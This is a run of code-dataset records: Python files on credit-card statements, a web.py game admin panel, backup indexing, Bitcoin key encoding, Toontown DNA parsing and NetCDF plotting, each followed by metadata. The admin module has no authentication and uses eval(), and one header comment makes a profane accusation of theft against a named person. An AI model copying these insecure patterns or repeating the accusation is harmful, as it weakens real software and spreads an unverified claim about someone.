:rtype: CCStatement
"""
return CCStatement(
self._interest_cls,
self._principal,
self._min_pay_cls,
self._billing_period.next_period,
transactions=transactions
)
def pay(self, amount):
"""
Return a new CCStatement reflecting the next billing period, with a
payment of `amount` applied to it at the middle of the period.
:param amount: amount to pay during the next statement period
:type amount: decimal.Decimal
:return: next period statement, with payment applied
:rtype: CCStatement
"""
return self.next_with_transactions({
self._billing_period.next_period.payment_date: amount
})
def subclass_dict(klass):
d = {}
for cls in klass.__subclasses__():
d[cls.__name__] = {
'description': cls.description,
'doc': cls.__doc__.strip(),
'cls': cls
}
return d
#: Dict mapping interest calculation class names to their description and
#: docstring.
INTEREST_CALCULATION_NAMES = subclass_dict(_InterestCalculation)
#: Dict mapping Minimum Payment Formula class names to their description and
#: docstring.
MIN_PAYMENT_FORMULA_NAMES = subclass_dict(_MinPaymentFormula)
#: Dict mapping Payoff Method class names to their description and docstring.
PAYOFF_METHOD_NAMES = subclass_dict(_PayoffMethod)
|
agpl-3.0
| -4,902,928,390,450,669,000
| 34.319887
| 80
| 0.587235
| false
| 4.281929
| false
| false
| false
|
rouge8/20questions
|
admin.py
|
1
|
2796
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
'''
admin.py
Andy Freeland and Dan Levy
5 June 2010
Provides administrative functions, such as retraining characters and deleting
objects and characters. Accessed at the /admin url. Laughably insecure.
'''
import web
import config, model
import twentyquestions as game
urls = (
'', 'admin',
'/', 'admin',
'/dq', 'delete_question',
'/do', 'delete_object',
'/data', 'data',
'/retrain/(\d+)', 'retrain'
)
render = web.template.render('templates', base='base')
app = web.application(urls, locals())
class admin:
def GET(self):
'''Renders the admin page, presenting a menu of administrative functions.'''
return render.admin()
class delete_question:
def GET(self):
'''Lists all of the questions so that selected questions can be deleted.'''
questions = model.get_questions()
return render.delete_question(questions)
def POST(self):
'''Deletes selected questions and returns to the admin page.'''
question_ids = web.input()
for id in question_ids:
model.delete_question(id)
raise web.seeother('/')
class delete_object:
def GET(self):
'''Lists all of the objects so that selected objects can be deleted.'''
objects = model.get_objects()
return render.delete_object(objects)
def POST(self):
'''Deletes selected objects. and returns to the admin page.'''
object_ids = web.input()
for id in object_ids:
model.delete_object(id)
raise web.seeother('/')
class data:
def GET(self):
'''Renders a page listing all of the objects so that they can be retrained.'''
objects = model.get_objects()
return render.data(list(objects))
class retrain:
def GET(self, object_id):
'''Renders a page with all of the questions and values for a specified
object_id so that it can be retrained manually.'''
object = model.get_object_by_id(object_id)
questions = model.get_questions()
data = model.get_data_dictionary()
if object:
return render.retrain(object, list(questions), data)
else:
raise web.seeother('/') # returns to admin page
def POST(self, object_id):
'''Updates object_id with the newly selected answers to questions.'''
inputs = web.input()
for question_id in inputs:
answer = inputs[question_id]
if answer in ['yes','no']:
value = eval('game.' + answer) * game.RETRAIN_SCALE # STRONGLY weights values learned this way
model.update_data(object_id, question_id, value)
raise web.seeother('/data')
|
mit
| 3,521,186,683,873,155,000
| 31.511628
| 110
| 0.609084
| false
| 4.111765
| false
| false
| false
|
gunny26/webstorage
|
bin/filename_to_checksum_dict.py
|
1
|
6212
|
#!/usr/bin/python3
# pylint: disable=line-too-long
# disable=locally-disabled, multiple-statements, fixme, line-too-long
"""
command line program to create/restore/test WebStorageArchives
"""
import os
import hashlib
import datetime
import dateutil.parser
import time
import sys
import socket
import argparse
import stat
import re
import sqlite3
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(message)s')
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
import json
import dbm
# own modules
from webstorage import WebStorageArchive as WebStorageArchive
from webstorage import FileStorageClient as FileStorageClient
class NtoM(object):
"""
build n : m dependent key value stores
"""
def __init__(self, keyname1, keyname2):
self.__keyname1 = keyname1
self.__keyname2 = keyname2
self.__filename = filename
self.__data = {
self.__keyname1 : {},
self.__keyname2 : {}
}
self.__dirty = False # indicate if data is modified in memory
def add(self, **kwds):
key1 = kwds[self.__keyname1]
key2 = kwds[self.__keyname2]
if key1 in self.__data[self.__keyname1]:
if key2 not in self.__data[self.__keyname1][key1]:
self.__data[self.__keyname1][key1].add(key2)
# ignore if value is already in list
else:
self.__data[self.__keyname1][key1] = set([key2, ])
if key2 in self.__data[self.__keyname2]:
if key1 not in self.__data[self.__keyname2][key2]:
self.__data[self.__keyname2][key2].add(key1)
# ignore if value is already in list
else:
self.__data[self.__keyname2][key2] = set([key1, ])
self.__dirty = True
def save(self, filename):
"""
dump internal data to sqlite database
"""
starttime = time.time()
conn = sqlite3.connect(filename)
cur = conn.cursor()
# key 1
tablename1 = "%s_to_%s" % (self.__keyname1, self.__keyname2)
logging.debug("saving to %s", tablename1)
cur.execute("drop table if exists %s" % tablename1)
conn.commit()
cur.execute("create table if not exists %s ('%s', '%s')" % (tablename1, self.__keyname1, self.__keyname2))
for key, value in self.__data[self.__keyname1].items():
cur.execute("insert into %s values (?, ?)" % tablename1, (key, json.dumps(list(value))))
conn.commit()
# key 2
tablename2 = "%s_to_%s" % (self.__keyname2, self.__keyname1)
logging.debug("saving to %s", tablename2)
cur.execute("drop table if exists %s" % tablename2)
conn.commit()
cur.execute("create table if not exists %s ('%s', '%s')" % (tablename2, self.__keyname2, self.__keyname1))
for key, value in self.__data[self.__keyname2].items():
cur.execute("insert into %s values (?, ?)" % tablename2, (key, json.dumps(list(value))))
conn.commit()
logging.debug("save done in %0.2f s", time.time()-starttime)
logging.debug("saved %d in %s", len(self.__data[self.__keyname1]), self.__keyname1)
logging.debug("saved %d in %s", len(self.__data[self.__keyname2]), self.__keyname2)
self.__dirty = False
def load(self, filename):
"""
dump internal data to sqlite database
"""
starttime = time.time()
conn = sqlite3.connect(filename)
cur = conn.cursor()
try:
# key 1
tablename1 = "%s_to_%s" % (self.__keyname1, self.__keyname2)
for row in cur.execute("select * from %s" % tablename1).fetchall():
self.__data[self.__keyname1][row[0]] = set(json.loads(row[1]))
# key 2
tablename2 = "%s_to_%s" % (self.__keyname2, self.__keyname1)
for row in cur.execute("select * from %s" % tablename2).fetchall():
self.__data[self.__keyname2][row[0]] = set(json.loads(row[1]))
logging.debug("load done in %0.2f s", time.time()-starttime)
logging.debug("loaded %d in %s", len(self.__data[self.__keyname1]), self.__keyname1)
logging.debug("loaded %d in %s", len(self.__data[self.__keyname2]), self.__keyname2)
except sqlite3.OperationalError as exc:
logging.info("ignoring if table does not exist")
def update(filename):
conn = sqlite3.connect(filename)
cur = conn.cursor()
cur.execute("create table if not exists backupsets_done (backupset)")
myhostname = socket.gethostname()
wsa = WebStorageArchive()
backupsets = wsa.get_backupsets(myhostname)
# like wse0000107_mesznera_2016-12-06T13:48:13.400565.wstar.gz
filename_to_checksum = NtoM("absfile", "checksum")
filename_to_checksum.load(filename)
filename_to_backupset = NtoM("absfile", "backupset")
filename_to_backupset.load(filename)
backupsets_done = [row[0] for row in cur.execute("select backupset from backupsets_done").fetchall()]
for backupset in backupsets:
starttime = time.time()
#if backupset in backupsets_done:
# print(" backupset %s already done" % backupset)
# continue
hostname, tag, isoformat_ext = backupset.split("_")
isoformat = isoformat_ext[:-9]
datestring = dateutil.parser.parse(isoformat)
print(hostname, tag, dateutil.parser.parse(isoformat))
data = wsa.get(backupset)
for absfile in data["filedata"].keys():
checksum = data["filedata"][absfile]["checksum"]
filename_to_checksum.add(absfile=absfile, checksum=checksum)
filename_to_backupset.add(absfile=absfile, backupset=backupset)
# print(data["filedata"][absfile])
#cur.execute("insert into backupsets_done values (?)", (backupset,))
#conn.commit()
logging.info(" done in %0.2f s", time.time()-starttime)
filename_to_checksum.save(filename)
filename_to_backupset.save(filename)
if __name__ == "__main__":
filename = "filename_to_checksum_dict.db"
#main(filename)
update(filename)
|
gpl-2.0
| 6,207,287,639,097,450,000
| 40.139073
| 114
| 0.61027
| false
| 3.715311
| false
| false
| false
|
ionux/bitforge
|
bitforge/utils/encoding.py
|
1
|
10832
|
# -*- coding: utf-8 -*-
"""
Various utilities useful for converting one Bitcoin format to another, including some
the human-transcribable format hashed_base58.
The MIT License (MIT)
Copyright (c) 2013 by Richard Kiss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import hashlib
from .intbytes import byte_to_int, bytes_from_int
BASE58_ALPHABET = b'123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
BASE58_BASE = len(BASE58_ALPHABET)
BASE58_LOOKUP = dict((c, i) for i, c in enumerate(BASE58_ALPHABET))
class EncodingError(Exception):
pass
def ripemd160(data):
return hashlib.new("ripemd160", data)
try:
ripemd160(b'').digest()
except Exception:
# stupid Google App Engine hashlib doesn't support ripemd160 for some stupid reason
# import it from pycrypto. You need to add
# - name: pycrypto
# version: "latest"
# to the "libraries" section of your app.yaml
from Crypto.Hash.RIPEMD import RIPEMD160Hash as ripemd160
def to_long(base, lookup_f, s):
"""
Convert an array to a (possibly bignum) integer, along with a prefix value
of how many prefixed zeros there are.
base:
the source base
lookup_f:
a function to convert an element of s to a value between 0 and base-1.
s:
the value to convert
"""
prefix = 0
v = 0
for c in s:
v *= base
try:
v += lookup_f(c)
except Exception:
raise EncodingError("bad character %s in string %s" % (c, s))
if v == 0:
prefix += 1
return v, prefix
def from_long(v, prefix, base, charset):
"""The inverse of to_long. Convert an integer to an arbitrary base.
v: the integer value to convert
prefix: the number of prefixed 0s to include
base: the new base
charset: an array indicating what printable character to use for each value.
"""
l = bytearray()
while v > 0:
try:
v, mod = divmod(v, base)
l.append(charset(mod))
except Exception:
raise EncodingError("can't convert to character corresponding to %d" % mod)
l.extend([charset(0)] * prefix)
l.reverse()
return bytes(l)
def to_bytes_32(v):
v = from_long(v, 0, 256, lambda x: x)
if len(v) > 32:
raise ValueError("input to to_bytes_32 is too large")
return ((b'\0' * 32) + v)[-32:]
if hasattr(int, "to_bytes"):
to_bytes_32 = lambda v: v.to_bytes(32, byteorder="big")
def from_bytes_32(v):
if len(v) != 32:
raise ValueError("input to from_bytes_32 is wrong length")
return to_long(256, byte_to_int, v)[0]
if hasattr(int, "from_bytes"):
from_bytes_32 = lambda v: int.from_bytes(v, byteorder="big")
def double_sha256(data):
"""A standard compound hash."""
return hashlib.sha256(hashlib.sha256(data).digest()).digest()
def hash160(data):
"""A standard compound hash."""
return ripemd160(hashlib.sha256(data).digest()).digest()
def b2a_base58(s):
"""Convert binary to base58 using BASE58_ALPHABET. Like Bitcoin addresses."""
v, prefix = to_long(256, byte_to_int, s)
s = from_long(v, prefix, BASE58_BASE, lambda v: BASE58_ALPHABET[v])
return s.decode("utf8")
def a2b_base58(s):
"""Convert base58 to binary using BASE58_ALPHABET."""
v, prefix = to_long(BASE58_BASE, lambda c: BASE58_LOOKUP[c], s.encode("utf8"))
return from_long(v, prefix, 256, lambda x: x)
def b2a_hashed_base58(data):
"""
A "hashed_base58" structure is a base58 integer (which looks like a string)
with four bytes of hash data at the end. Bitcoin does this in several places,
including Bitcoin addresses.
This function turns data (of type "bytes") into its hashed_base58 equivalent.
"""
return b2a_base58(data + double_sha256(data)[:4])
def a2b_hashed_base58(s):
"""
If the passed string is hashed_base58, return the binary data.
Otherwise raises an EncodingError.
"""
data = a2b_base58(s)
data, the_hash = data[:-4], data[-4:]
if double_sha256(data)[:4] == the_hash:
return data
raise EncodingError("hashed base58 has bad checksum %s" % s)
def is_hashed_base58_valid(base58):
"""Return True if and only if base58 is valid hashed_base58."""
try:
a2b_hashed_base58(base58)
except EncodingError:
return False
return True
def wif_to_tuple_of_prefix_secret_exponent_compressed(wif):
"""
Return a tuple of (prefix, secret_exponent, is_compressed).
"""
decoded = a2b_hashed_base58(wif)
actual_prefix, private_key = decoded[:1], decoded[1:]
compressed = len(private_key) > 32
return actual_prefix, from_bytes_32(private_key[:32]), compressed
def wif_to_tuple_of_secret_exponent_compressed(wif, allowable_wif_prefixes=[b'\x80']):
"""Convert a WIF string to the corresponding secret exponent. Private key manipulation.
Returns a tuple: the secret exponent, as a bignum integer, and a boolean indicating if the
WIF corresponded to a compressed key or not.
Not that it matters, since we can use the secret exponent to generate both the compressed
and uncompressed Bitcoin address."""
actual_prefix, secret_exponent, is_compressed = wif_to_tuple_of_prefix_secret_exponent_compressed(wif)
if actual_prefix not in allowable_wif_prefixes:
raise EncodingError("unexpected first byte of WIF %s" % wif)
return secret_exponent, is_compressed
def wif_to_secret_exponent(wif, allowable_wif_prefixes=[b'\x80']):
"""Convert a WIF string to the corresponding secret exponent."""
return wif_to_tuple_of_secret_exponent_compressed(wif, allowable_wif_prefixes=allowable_wif_prefixes)[0]
def is_valid_wif(wif, allowable_wif_prefixes=[b'\x80']):
"""Return a boolean indicating if the WIF is valid."""
try:
wif_to_secret_exponent(wif, allowable_wif_prefixes=allowable_wif_prefixes)
except EncodingError:
return False
return True
def secret_exponent_to_wif(secret_exp, compressed=True, wif_prefix=b'\x80'):
"""Convert a secret exponent (correspdong to a private key) to WIF format."""
d = wif_prefix + to_bytes_32(secret_exp)
if compressed:
d += b'\01'
return b2a_hashed_base58(d)
def public_pair_to_sec(public_pair, compressed=True):
"""Convert a public pair (a pair of bignums corresponding to a public key) to the
gross internal sec binary format used by OpenSSL."""
x_str = to_bytes_32(public_pair[0])
if compressed:
return bytes_from_int((2 + (public_pair[1] & 1))) + x_str
y_str = to_bytes_32(public_pair[1])
return b'\4' + x_str + y_str
def sec_to_public_pair(sec):
"""Convert a public key in sec binary format to a public pair."""
x = from_bytes_32(sec[1:33])
sec0 = sec[:1]
if sec0 == b'\4':
y = from_bytes_32(sec[33:65])
from ecdsa import is_public_pair_valid
from secp256k1 import generator_secp256k1
public_pair = (x, y)
# verify this is on the curve
if not is_public_pair_valid(generator_secp256k1, public_pair):
raise EncodingError("invalid (x, y) pair")
return public_pair
if sec0 in (b'\2', b'\3'):
from ecdsa import public_pair_for_x
from secp256k1 import generator_secp256k1
return public_pair_for_x(generator_secp256k1, x, is_even=(sec0 == b'\2'))
raise EncodingError("bad sec encoding for public key")
def is_sec_compressed(sec):
"""Return a boolean indicating if the sec represents a compressed public key."""
return sec[:1] in (b'\2', b'\3')
def public_pair_to_hash160_sec(public_pair, compressed=True):
"""Convert a public_pair (corresponding to a public key) to hash160_sec format.
This is a hash of the sec representation of a public key, and is used to generate
the corresponding Bitcoin address."""
return hash160(public_pair_to_sec(public_pair, compressed=compressed))
def hash160_sec_to_bitcoin_address(hash160_sec, address_prefix=b'\0'):
"""Convert the hash160 of a sec version of a public_pair to a Bitcoin address."""
return b2a_hashed_base58(address_prefix + hash160_sec)
def bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address):
"""
Convert a Bitcoin address back to the hash160_sec format and
also return the prefix.
"""
blob = a2b_hashed_base58(bitcoin_address)
if len(blob) != 21:
raise EncodingError("incorrect binary length (%d) for Bitcoin address %s" %
(len(blob), bitcoin_address))
if blob[:1] not in [b'\x6f', b'\0']:
raise EncodingError("incorrect first byte (%s) for Bitcoin address %s" % (blob[0], bitcoin_address))
return blob[1:], blob[:1]
def bitcoin_address_to_hash160_sec(bitcoin_address, address_prefix=b'\0'):
"""Convert a Bitcoin address back to the hash160_sec format of the public key.
Since we only know the hash of the public key, we can't get the full public key back."""
hash160, actual_prefix = bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address)
if (address_prefix == actual_prefix):
return hash160
raise EncodingError("Bitcoin address %s for wrong network" % bitcoin_address)
def public_pair_to_bitcoin_address(public_pair, compressed=True, address_prefix=b'\0'):
"""Convert a public_pair (corresponding to a public key) to a Bitcoin address."""
return hash160_sec_to_bitcoin_address(public_pair_to_hash160_sec(
public_pair, compressed=compressed), address_prefix=address_prefix)
def is_valid_bitcoin_address(bitcoin_address, allowable_prefixes=b'\0'):
"""Return True if and only if bitcoin_address is valid."""
try:
hash160, prefix = bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address)
except EncodingError:
return False
return prefix in allowable_prefixes
|
mit
| -1,994,404,400,331,621,600
| 34.631579
| 108
| 0.681961
| false
| 3.545663
| false
| false
| false
|
DedMemez/ODS-August-2017
|
dna/DNAVisGroup.py
|
1
|
2344
|
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.dna.DNAVisGroup
from panda3d.core import LVector3, LVector3f
import DNAGroup
import DNABattleCell
import DNAUtil
class DNAVisGroup(DNAGroup.DNAGroup):
COMPONENT_CODE = 2
def __init__(self, name):
DNAGroup.DNAGroup.__init__(self, name)
self.visibles = []
self.suitEdges = []
self.battleCells = []
def getVisGroup(self):
return self
def addBattleCell(self, battleCell):
self.battleCells.append(battleCell)
def addSuitEdge(self, suitEdge):
self.suitEdges.append(suitEdge)
def addVisible(self, visible):
self.visibles.append(visible)
def getBattleCell(self, i):
return self.battleCells[i]
def getNumBattleCells(self):
return len(self.battleCells)
def getNumSuitEdges(self):
return len(self.suitEdges)
def getNumVisibles(self):
return len(self.visibles)
def getSuitEdge(self, i):
return self.suitEdges[i]
def getVisibleName(self, i):
return self.visibles[i]
def getVisibles(self):
return self.visibles
def removeBattleCell(self, cell):
self.battleCells.remove(cell)
def removeSuitEdge(self, edge):
self.suitEdges.remove(edge)
def removeVisible(self, visible):
self.visibles.remove(visible)
def makeFromDGI(self, dgi, dnaStorage):
DNAGroup.DNAGroup.makeFromDGI(self, dgi)
numEdges = dgi.getUint16()
for _ in xrange(numEdges):
index = dgi.getUint16()
endPoint = dgi.getUint16()
self.addSuitEdge(dnaStorage.getSuitEdge(index, endPoint))
numVisibles = dgi.getUint16()
for _ in xrange(numVisibles):
self.addVisible(DNAUtil.dgiExtractString8(dgi))
numCells = dgi.getUint16()
for _ in xrange(numCells):
w = dgi.getUint8()
h = dgi.getUint8()
x, y, z = [ dgi.getInt32() / 100.0 for i in xrange(3) ]
self.addBattleCell(DNABattleCell.DNABattleCell(w, h, LVector3f(x, y, z)))
def destroy(self):
del self.visibles[:]
del self.suitEdges[:]
del self.battleCells[:]
DNAGroup.DNAGroup.destroy(self)
|
apache-2.0
| 3,608,324,131,246,925,300
| 26.962963
| 85
| 0.611348
| false
| 3.397101
| false
| false
| false
|
CopyChat/Plotting
|
Python/PythonNetCDF.py
|
1
|
10821
|
'''
NAME
NetCDF with Python
PURPOSE
To demonstrate how to read and write data with NetCDF files using
a NetCDF file from the NCEP/NCAR Reanalysis.
Plotting using Matplotlib and Basemap is also shown.
PROGRAMMER(S)
Chris Slocum
REVISION HISTORY
20140320 -- Initial version created and posted online
20140722 -- Added basic error handling to ncdump
Thanks to K.-Michael Aye for highlighting the issue
REFERENCES
netcdf4-python -- http://code.google.com/p/netcdf4-python/
NCEP/NCAR Reanalysis -- Kalnay et al. 1996
http://dx.doi.org/10.1175/1520-0477(1996)077<0437:TNYRP>2.0.CO;2
'''
import datetime as dt # Python standard library datetime module
import numpy as np
from netCDF4 import Dataset # http://code.google.com/p/netcdf4-python/
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
def ncdump(nc_fid, verb=True):
'''
ncdump outputs dimensions, variables and their attribute information.
The information is similar to that of NCAR's ncdump utility.
ncdump requires a valid instance of Dataset.
Parameters
----------
nc_fid : netCDF4.Dataset
A netCDF4 dateset object
verb : Boolean
whether or not nc_attrs, nc_dims, and nc_vars are printed
Returns
-------
nc_attrs : list
A Python list of the NetCDF file global attributes
nc_dims : list
A Python list of the NetCDF file dimensions
nc_vars : list
A Python list of the NetCDF file variables
'''
def print_ncattr(key):
"""
Prints the NetCDF file attributes for a given key
Parameters
----------
key : unicode
a valid netCDF4.Dataset.variables key
"""
try:
print "\t\ttype:", repr(nc_fid.variables[key].dtype)
for ncattr in nc_fid.variables[key].ncattrs():
print '\t\t%s:' % ncattr,\
repr(nc_fid.variables[key].getncattr(ncattr))
except KeyError:
print "\t\tWARNING: %s does not contain variable attributes" % key
# NetCDF global attributes
nc_attrs = nc_fid.ncattrs()
if verb:
print "NetCDF Global Attributes:"
for nc_attr in nc_attrs:
print '\t%s:' % nc_attr, repr(nc_fid.getncattr(nc_attr))
nc_dims = [dim for dim in nc_fid.dimensions] # list of nc dimensions
# Dimension shape information.
if verb:
print "NetCDF dimension information:"
for dim in nc_dims:
print "\tName:", dim
print "\t\tsize:", len(nc_fid.dimensions[dim])
print_ncattr(dim)
# Variable information.
nc_vars = [var for var in nc_fid.variables] # list of nc variables
if verb:
print "NetCDF variable information:"
for var in nc_vars:
if var not in nc_dims:
print '\tName:', var
print "\t\tdimensions:", nc_fid.variables[var].dimensions
print "\t\tsize:", nc_fid.variables[var].size
print_ncattr(var)
return nc_attrs, nc_dims, nc_vars
nc_f = './CLM45_Micro_UW_SRF.2005120100.for.test.nc' # Your filename
nc_fid = Dataset(nc_f, 'r') # Dataset is the class behavior to open the file
# and create an instance of the ncCDF4 class
nc_attrs, nc_dims, nc_vars = ncdump(nc_fid)
# Extract data from NetCDF file
lats = nc_fid.variables['xlat'][:] # extract/copy the data
lons = nc_fid.variables['xlon'][:]
time = nc_fid.variables['time'][:]
rsds = nc_fid.variables['rsds'][:] # shape is time, lat, lon as shown above
time_idx = 237 # some random day in 2012
# Python and the renalaysis are slightly off in time so this fixes that problem
offset = dt.timedelta(hours=48)
# List of all times in the file as datetime objects
dt_time = [dt.date(1, 1, 1) + dt.timedelta(hours=t/20) - offset\
for t in time]
cur_time = dt_time[time_idx]
# Plot of global temperature on our random day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
# Setup the map. See http://matplotlib.org/basemap/users/mapsetup.html
# for other projections.
m = Basemap(projection='moll', llcrnrlat=-90, urcrnrlat=90,\
llcrnrlon=0, urcrnrlon=360, resolution='c', lon_0=0)
m.drawcoastlines()
m.drawmapboundary()
# Make the plot continuous
test=rsds[0,:,:]
print test.shape
print rsds.shape
print lons.shape
rsds_cyclic, lons_cyclic = addcyclic(rsds[time_idx,:,:], lons)
# Shift the grid so lons go from -180 to 180 instead of 0 to 360.
rsds_cyclic, lons_cyclic = shiftgrid(180., rsds_cyclic, lons_cyclic, start=False)
# Create 2D lat/lon arrays for Basemap
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
# Transforms lat/lon into plotting coordinates for projection
x, y = m(lon2d, lat2d)
# Plot of rsds temperature with 11 contour intervals
cs = m.contourf(x, y, rsds_cyclic, 11, cmap=plt.cm.Spectral_r)
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.title("%s on %s" % (nc_fid.variables['rsds'].var_desc, cur_time))
# Writing NetCDF files
# For this example, we will create two NetCDF4 files. One with the global rsds
# temperature departure from its value at Darwin, Australia. The other with
# the temperature profile for the entire year at Darwin.
darwin = {'name': 'Darwin, Australia', 'lat': -12.45, 'lon': 130.83}
# Find the nearest latitude and longitude for Darwin
lat_idx = np.abs(lats - darwin['lat']).argmin()
lon_idx = np.abs(lons - darwin['lon']).argmin()
# Simple example: temperature profile for the entire year at Darwin.
# Open a new NetCDF file to write the data to. For format, you can choose from
# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'
w_nc_fid = Dataset('darwin_2012.nc', 'w', format='NETCDF4')
w_nc_fid.description = "NCEP/NCAR Reanalysis %s from its value at %s. %s" %\
(nc_fid.variables['rsds'].var_desc.lower(),\
darwin['name'], nc_fid.description)
# Using our previous dimension info, we can create the new time dimension
# Even though we know the size, we are going to set the size to unknown
w_nc_fid.createDimension('time', None)
w_nc_dim = w_nc_fid.createVariable('time', nc_fid.variables['time'].dtype,\
('time',))
# You can do this step yourself but someone else did the work for us.
for ncattr in nc_fid.variables['time'].ncattrs():
w_nc_dim.setncattr(ncattr, nc_fid.variables['time'].getncattr(ncattr))
# Assign the dimension data to the new NetCDF file.
w_nc_fid.variables['time'][:] = time
w_nc_var = w_nc_fid.createVariable('rsds', 'f8', ('time'))
w_nc_var.setncatts({'long_name': u"mean Daily Air temperature",\
'units': u"degK", 'level_desc': u'Surface',\
'var_desc': u"Air temperature",\
'statistic': u'Mean\nM'})
w_nc_fid.variables['rsds'][:] = rsds[time_idx, lat_idx, lon_idx]
w_nc_fid.close() # close the new file
# A plot of the temperature profile for Darwin in 2012
fig = plt.figure()
plt.plot(dt_time, rsds[:, lat_idx, lon_idx], c='r')
plt.plot(dt_time[time_idx], rsds[time_idx, lat_idx, lon_idx], c='b', marker='o')
plt.text(dt_time[time_idx], rsds[time_idx, lat_idx, lon_idx], cur_time,\
ha='right')
fig.autofmt_xdate()
plt.ylabel("%s (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.xlabel("Time")
plt.title("%s from\n%s for %s" % (nc_fid.variables['rsds'].var_desc,\
darwin['name'], cur_time.year))
# Complex example: global temperature departure from its value at Darwin
departure = rsds[:, :, :] - rsds[:, lat_idx, lon_idx].reshape((time.shape[0],\
1, 1))
# Open a new NetCDF file to write the data to. For format, you can choose from
# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'
w_nc_fid = Dataset('rsds.departure.sig995.2012.nc', 'w', format='NETCDF4')
w_nc_fid.description = "The departure of the NCEP/NCAR Reanalysis " +\
"%s from its value at %s. %s" %\
(nc_fid.variables['rsds'].var_desc.lower(),\
darwin['name'], nc_fid.description)
# Using our previous dimension information, we can create the new dimensions
data = {}
for dim in nc_dims:
w_nc_fid.createDimension(dim, nc_fid.variables[dim].size)
data[dim] = w_nc_fid.createVariable(dim, nc_fid.variables[dim].dtype,\
(dim,))
# You can do this step yourself but someone else did the work for us.
for ncattr in nc_fid.variables[dim].ncattrs():
data[dim].setncattr(ncattr, nc_fid.variables[dim].getncattr(ncattr))
# Assign the dimension data to the new NetCDF file.
w_nc_fid.variables['time'][:] = time
w_nc_fid.variables['lat'][:] = lats
w_nc_fid.variables['lon'][:] = lons
# Ok, time to create our departure variable
w_nc_var = w_nc_fid.createVariable('rsds_dep', 'f8', ('time', 'lat', 'lon'))
w_nc_var.setncatts({'long_name': u"mean Daily Air temperature departure",\
'units': u"degK", 'level_desc': u'Surface',\
'var_desc': u"Air temperature departure",\
'statistic': u'Mean\nM'})
w_nc_fid.variables['rsds_dep'][:] = departure
w_nc_fid.close() # close the new file
# Rounded maximum absolute value of the departure used for contouring
max_dep = np.round(np.abs(departure[time_idx, :, :]).max()+5., decimals=-1)
# Generate a figure of the departure for a single day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
m = Basemap(projection='moll', llcrnrlat=-90, urcrnrlat=90,\
llcrnrlon=0, urcrnrlon=360, resolution='c', lon_0=0)
m.drawcoastlines()
m.drawmapboundary()
dep_cyclic, lons_cyclic = addcyclic(departure[time_idx, :, :], lons)
dep_cyclic, lons_cyclic = shiftgrid(180., dep_cyclic, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
levels = np.linspace(-max_dep, max_dep, 11)
cs = m.contourf(x, y, dep_cyclic, levels=levels, cmap=plt.cm.bwr)
x, y = m(darwin['lon'], darwin['lat'])
plt.plot(x, y, c='c', marker='o')
plt.text(x, y, 'Darwin,\nAustralia', color='r', weight='semibold')
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s departure (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.title("Departure of Global %s from\n%s for %s" %\
(nc_fid.variables['rsds'].var_desc, darwin['name'], cur_time))
plt.show()
# Close original NetCDF file.
nc_fid.close()
|
gpl-3.0
| 2,362,746,802,840,747,500
| 42.633065
| 81
| 0.641253
| false
| 3.204323
| false
| false
| false
|
tek/amino
|
amino/tree.py
|
1
|
14049
|
import abc
from typing import Callable, TypeVar, Generic, Union, cast, Any
from amino.logging import Logging
from amino import LazyList, Boolean, __, _, Either, Right, Maybe, Left, L, Map, curried
from amino.boolean import false, true
from amino.tc.base import Implicits
from amino.tc.flat_map import FlatMap
from amino.func import call_by_name
from amino.lazy_list import LazyLists
def indent(strings: LazyList[str]) -> LazyList[str]:
return strings.map(' ' + _)
Data = TypeVar('Data')
Data1 = TypeVar('Data1')
Sub = TypeVar('Sub')
Sub1 = TypeVar('Sub1')
A = TypeVar('A')
B = TypeVar('B')
Z = TypeVar('Z')
Key = Union[str, int]
class Node(Generic[Data, Sub], Logging, abc.ABC, Implicits, implicits=True, auto=True):
@abc.abstractproperty
def sub(self) -> Sub:
...
@abc.abstractproperty
def sub_l(self) -> LazyList['Node[Data, Any]']:
...
@abc.abstractmethod
def _strings(self) -> LazyList[str]:
...
@property
def strings(self) -> LazyList[str]:
return self._strings()
def _show(self) -> str:
return self._strings().mk_string('\n')
@property
def show(self) -> str:
return self._show()
